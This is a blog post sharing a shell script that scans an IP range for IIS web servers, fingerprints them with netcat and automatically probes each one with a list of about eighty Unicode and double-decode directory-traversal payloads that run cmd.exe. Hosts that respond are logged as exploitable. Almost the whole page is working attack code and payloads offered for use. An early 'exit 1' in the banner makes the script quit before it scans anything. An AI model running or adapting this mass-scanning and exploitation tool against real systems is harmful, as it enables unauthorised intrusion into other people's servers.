IISscan shell script

Schreibe eine Antwort

IIS Scanner

you can find this script also at http://packetstormsecurity.com/

head.cmd

HEAD / HTTP/1.0

iisscan.sh

#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
clear
if [ $# -ne 2 ]
    then
	echo "$0 [ip room] [outputfile]" >&2
	exit 0
	else
	    echo "Written by cd ;)"
	    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
	    echo "Scan started against to $1 on port 80"

	echo "This can take a while"
	nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
	cat $1.out | grep open | cut '-d ' -f 2 > $2
	fi
rm $1.out
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of any http server!!!

      Thanks for use ..."
	rm $2
	exit 1
    fi

echo "Please wait... 
      Testing server versions"
    while read host ;
	do 
	     echo "         Get http server version from: $host"
	    netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
	done < $2
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of IIS 

      Thanks for use ..."
	rm hosts.$1.tmp
	rm $2
	exit 1
    fi
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
touch $2.exp
while read host;
 do 
 echo "Try to Exploit $host"
 while read unicodes;
 do
 echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
 sum=0
    g=`cat fluff | wc -c`
    sum=`expr $sum + $g`
    if [ $sum = 0 ]
	then 
	    echo "try $unicodes"
	    else 
		echo "$host is Exploitable with $unicodes"
		echo $host >>$2.exp
    fi
    done < unicodes.txt
 done < $2
rm fluff
sum=0
g=`cat $2.exp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
	rm $2.exp
echo "
      No matches of Exploitable IIS
      In  >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "
	exit 1
    fi
echo "

      You can find a list of Exploitable IIS in >> $2.exp << 
      and in >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "

an old list of Unicodes
unicodes.txt

GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir
GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/root.exe?/c+dir
GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert